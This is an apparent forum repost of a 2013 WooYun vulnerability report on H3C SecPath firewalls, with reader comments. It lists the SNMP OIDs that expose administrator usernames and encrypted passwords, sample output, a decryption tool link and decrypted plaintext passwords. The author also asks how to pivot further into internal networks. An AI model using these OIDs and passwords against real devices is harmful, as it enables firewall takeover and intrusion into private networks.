参考资料

WooYun: 中国移动H3C防火墙侧漏,利用snmp获取管理员密码,成功登录设备!

测试型号:h3c SecPath F5000-A5

漏洞详情

管理员用户名和密码可以通过snmp读取,从而获得管理权限。h3c的私有mib有两种,一种是2011(huawei h3c),一种是25506(hh3c)。经过测试发现,有些设备只支持一种。如果一种获取不到数据,可以两种都尝试下。相关的oid为:

1.3.6.1.4.1.2011.10.2.12.1.1.1.1.1 h3cUserName OCTET-STRING admin
1.3.6.1.4.1.2011.10.2.12.1.1.1.1.2 h3cUserName OCTET-STRING h3c
1.3.6.1.4.1.2011.10.2.12.1.1.1.1.3 h3cUserName OCTET-STRING pppoe
1.3.6.1.4.1.2011.10.2.12.1.1.1.2.1 h3cUserPassword OCTET-STRING .]@USE=B,53Q=^Q`MAF4<1!!
1.3.6.1.4.1.2011.10.2.12.1.1.1.2.2 h3cUserPassword OCTET-STRING test
1.3.6.1.4.1.2011.10.2.12.1.1.1.2.3 h3cUserPassword OCTET-STRING pppoe

1.3.6.1.4.1.2011.10.2.12.1.1.1.1.1为用户名,

如果有多个用户则最后一位依次为2,3...

1.3.6.1.4.1.2011.10.2.12.1.1.1.2.1为第一个用户的密码,以此类推。

后面还有一些oid可以获取用户用户是否有管理权限等。需要详细研究的话可以walk一下看看。

25506 相关的oid为:

1.3.6.1.4.1.25506.2.12.1.1.1.1.1 h3c
1.3.6.1.4.1.25506.2.12.1.1.1.2.1 P.KG0>5&YV3;5#)%#Z[VS1!!
1.3.6.1.4.1.25506.2.12.1.1.1.3.1 7
1.3.6.1.4.1.25506.2.12.1.1.1.4.1 3
1.3.6.1.4.1.25506.2.12.1.1.1.5.1 0
1.3.6.1.4.1.25506.2.12.1.1.1.6.1 1

同样,第一个为用户名,第二个为密码。

获取到的密码是一个加密的字符串。解密工具:https://github.com/grutz/h3c-pt-tools/blob/master/hh3c_cipher.py

.]@USE=B,53Q=^Q`MAF4<1!!: admin
-AO7S27&QTCQ=^Q`MAF4<1!!: h3c123
P.KG0>5&YV3;5#)%#Z[VS1!!: Zjyd_h3c_10

如上,可以直接得到明文的密码。然后就可以在web登录了。

后续渗透,求讨论。获取了防火墙的管理权限,如果继续渗透内网。~~~可以ssh开ssh连上去,不知道有木有抓包,转发流量的命令啊。

[原帖地址]

相关讨论:

1#

无敌L.t.H (:?门安天京北爱我) | 2013-07-17 11:30

华为路由的SSH不支持forward的……只能Shell和SFTP。

不过好像可以做端口镜像,不过你也没设备接上去……

2#

xsser (十根阳具有长短!!) | 2013-07-17 12:03

怀念 @s3cur1ty

3#

D&G | 2013-07-17 12:36

@xsser @s3cur1ty 去哪了~~

留言评论(旧系统):

= = @ 2015-04-24 17:15:39

= = kali下的python运行解密程序闪退阿。。。能看下么?谢核总

本站回复:

额,没有环境,你百度一下吧。